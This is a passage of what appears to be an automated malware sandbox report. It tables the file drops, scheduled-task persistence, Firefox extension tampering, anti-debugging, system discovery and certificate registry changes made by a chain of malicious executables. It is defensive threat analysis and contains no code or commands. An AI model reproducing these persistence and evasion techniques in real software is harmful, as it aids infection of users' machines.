| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\7zS1112.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_2F09F384AB04F931E2EF39FD04145E2F | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000223001\5133bb271c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File created | C:\Program Files (x86)\fWKfJhFBpXaU2\ikLGbIa.xml | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File created | C:\Program Files (x86)\NtKBDVlqGeDOC\kdKHTTm.dll | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File created | C:\Program Files (x86)\NtKBDVlqGeDOC\ylsGUBM.xml | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File created | C:\Program Files (x86)\tEtgnFrpU\wTmFWi.dll | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File created | C:\Program Files (x86)\FaFtrxulSluCDxNNaBR\NtsjTXn.dll | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File created | C:\Program Files (x86)\yFrevNMMqpUn\vzNGYPQ.dll | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File created | C:\Program Files (x86)\FaFtrxulSluCDxNNaBR\KuEZhQS.xml | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File created | C:\Program Files (x86)\tEtgnFrpU\WoiCHNf.xml | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File created | C:\Program Files (x86)\fWKfJhFBpXaU2\DwITQmvFjWfiH.dll | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\1000223001\5133bb271c.exe | N/A |
| File created | C:\Windows\Tasks\bDxiLwhXhHymEtvbIE.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\HovMjXmPFmPaOitfx.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\tYoFyIhdoQFSznw.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\LoKdpWjMYhBLfdjtb.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSE14.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\gpupdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\gpupdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\TpBxXTKipS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000269001\acentric.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\hk0hesKyTJ.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\DHE0skkKWT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\gpupdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000267001\ldx111.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000267001\ldx111.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000267001\ldx111.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000267001\ldx111.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS1112.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS1112.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{3a4c38fd-0000-0000-0000-d01200000000} | C:\Users\Admin\AppData\Local\Temp\7zS1112.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{3a4c38fd-0000-0000-0000-d01200000000} | C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{3a4c38fd-0000-0000-0000-d01200000000}\NukeOnDelete = "0" | C:\Users\Admin\AppData\Local\Temp\7zS1112.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
